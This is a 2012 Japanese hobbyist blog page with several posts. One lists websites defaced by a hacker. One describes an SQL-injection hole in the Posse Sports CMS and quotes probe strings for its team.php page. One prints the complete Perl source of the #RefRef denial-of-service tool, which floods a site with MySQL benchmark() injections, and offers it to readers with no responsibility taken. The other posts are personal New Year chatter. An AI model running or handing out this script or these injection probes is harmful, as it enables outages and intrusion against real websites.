PHP開発者からネット環境を取り上げると...

2012年01月06日17:18

気分でソース見てたらアラブ系のハッカーサイトに出くわしたww

カテゴリ
このエントリーをはてなブックマークに追加 mixiチェック Clip to Evernote
先ほどのDemoサイトが侵入されたサイトではHack By GembalaMalamと書かれていたので、GembalaMalamさんを調べてみると、www.kenruss.com/ というサイトがGembalaMalamにハックされていました。

このサイト、死にそうな人の画像とうるさい音楽が流れていたため、この音楽の発生元を調べてみました。

BINGO→http://xdieka-civilx.xp3.biz/swf/xxx.swf (五月蠅いので要注意)

では、このTopページを 調べてみると

cyberrootteam

なんと、アラブ系のハッカーサイトでした。ww

GembalaMalam に侵入されたサイト一覧(Googleのキャッシュデータより)
http://cute-dog.com/
http://www.hlv-wirt.de/
http://www.mashpaper.de/
http://www.almi.nl/
http://hookyhuffman.com
http://venturamattress.com
http://www.santabarbaramattress.net
http://valenciamattress.com
http://batesburg-leesville-reunion.com
http://travellingstones.de/
http://www.corinnaheimburger.de/
http://www.spass-steine.de/
http://pinkbus.dk/
http://www.gwinnettfire.com/images/
http://kenruss.com/
http://www.ranchomirageca.gov/content_files/shared
http://www.melissasatta.com/
http://naomicampbell.com/
http://www.monzabrianza.federvolley.it/
http://ourworldschool.org/images/uploads/index.jpg
http://www.pendletonumc.org/upload/index.jpg
http://gotosca.org/images/tosca/index.jpg
http://oneofthe99.org/images/uploads/index.jpg
http://www.ngapparel.net/images/index.jpg
http://collabo.co.uk/
http://mastaplan.net/
http://nethoneys.com/
http://www.ukurban.net/
http://rockcreekvelo.org/triathlon/index.jpg
http://www.itraxstudios.com/
http://nahravani.info/
http://sf-p.pl/images/index.jpg
http://www.churchnownetwork.com/
http://playnowyourbook.com/
 
2012年01月06日16:32

Posse Sports CMSの公式サイトのデモが侵入され、書き換えられる

カテゴリ
このエントリーをはてなブックマークに追加 mixiチェック Clip to Evernote
Posse Sportsとは、地域の草野球やサッカー等の人たち向けに作られた、コミュニティ&ブログのテンプレートプログラムですが、先日、PHPの脆弱性によりシステムを書き換えられるという警告がハッカーサイト内でめぐりました。(SQLのインジェクション脆弱性を利用した、team.phpのハック 

    team.php?idteam=1+and+1=1--+ #true
    team.php?idteam=1+and+1=2--+ #false


しかし、見つかったのが12月30日。。多分作ったプログラマは全く気づいていないようで脆弱性をまだ直していませんでした。そして、どこかの厨房がついに、Demoサイトをハックし、サイト内を書き換えてしまいました。

以下写真
output

現在もこのサイトは続いています。
  http://possesports.com/softball/ 
現在、次々にこのテンプレートを使ったサイトが書き換えられています。
http://usssahawaii.com/ (これは笑ったw)

「このサイトの管理人に告ぐ。このCMSは脆弱性がある。他のスクリプトキディ(似非ハッカー)に侵入され、あなたが損失を出さないために私がこのサイトに侵入し、ある程度ブロックした。(わかりやすく略しました)あなたはこのCMSを開発をしたサイトの管理人にメールをし、今後の対策を練ってください。」

うん、もうその本家自体がやばい方にかきかえられてるんだって。wでもブラックハッカーにしては正義感のある人ですね。

まあ、あんまり使わないだろうし被害もアメリカの草野球チームだけで、ということで大丈夫でしょう。

タグ :
Posse
Sports
CMS
DEMOハック
ハッキングされる
公式サイトが書き換えられる
2012年01月06日15:46

久しぶりに#RefRefのコードを見つけたので、てきとーにメモ

カテゴリ
このエントリーをはてなブックマークに追加 mixiチェック Clip to Evernote
#RefRef のそーすこーど

#!usr/bin/perl
#RefRef © Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
 
}  

つーか、ハッキング系の動画ってみんなこの曲好きだよな

潰れたけど、こっちが本家の動画(333MBのAVI動画をRARで7.85MBに圧縮されてます)

http://www.multiupload.com/4L3YZPV0CK

なんだか、Anonymousを応援してるみたいな記事になってますが、全く違います。Anonymousとか興味ないです。自分の技術を高めたいって言うだけで、まあメモ見たいなものです。使いたい人はどうぞ。私は一切の責任を負いません。
タグ :
#RefRef
2012年01月06日10:08

あけましておめでとうございます。

カテゴリ
このエントリーをはてなブックマークに追加 mixiチェック Clip to Evernote
新年あけましておめでとうございます。今年もよろしくおねがいします。ーーというか、もう三が日も過ぎてるし。何やってるんだろうw

相変わらず割れネタが多いブログではありますが、今年からは大学にも入学することになり、推薦者向けの大学の宿題で追われている毎日であります。今年は大学生一年目ということもあり、とても大事な期間であることは間違いないと思います。そのため、投稿の期間が開いてしまうことも多々ありますが、今年もよろしくお願い致します。

今日、500GBの中古HDDがついに満杯になり、次に用意してある200GBのHDDへ引き継ぐためにファイルの整理をしているところ、しょっちゅうHDDの電源が落ちてしまい中々進まん!!

この中古の500GBのHDDってたしか秋葉原で540円で買ったんだっけww

タイの震災の影響もあって、今度の200GBのHDDは1200円もしました。(安w)

更には、SATA→USB変換ケーブルを使ってるもんですから、Sataの電源ケーブルが断線し易い。

今日中にはフォルダリストをEvernoteに記録したいと思います。
2011年12月30日18:09

大片付けしました

カテゴリ
このエントリーをはてなブックマークに追加 mixiチェック Clip to Evernote
部屋を大片付けしました。そして、部屋の本棚を全部ピッチリ合わせたところ、 部屋内に二人分が入れるぐらいのスペースができ、パソコン部品やバレたら不味いもの(コーラーの空きペットボトル20本位wwなんで貯めたのかは自分でもわからないけど、見つかったら怒られそうw)をぎっしり詰めて、すべて記憶から消去しました。これで、今年は年を越せそうです。

新年のお話なんですが、私、 1月1日生まれなんですww(ガチで)!!

実際はアメリカのニュージャージー州のchathamで生まれました。

という訳で、新年あけましておめでとう。&「Coffee0101さん誕生日おめでとう」って祝ってくださいw

今年で18歳のなりました。

多分、明日はアニメ見てるか、テレビを見てると思いますので


皆さん  良いお年を!!
タグ :
1月1日は私の誕生日
元日生まれ
誕生日
最新コメント
4sharedが日本からの規制 (kiki)
最近のPremium link generatorをまとめてみた (管理人)
最近のPremium link generatorをまとめてみた (NYY)
最近のPremium link generatorをまとめてみた (mas)
最近のPremium link generatorをまとめてみた (管理人)
最近のPremium link generatorをまとめてみた (TU)
最近のPremium link generatorをまとめてみた (管理人)
4sharedが日本からの規制 (管理人)
4sharedが日本からの規制 (___)
4sharedが日本からの規制 (fin)
アクセスカウンター
  • 今日:
  • 昨日:
  • 累計:

  • ライブドアブログ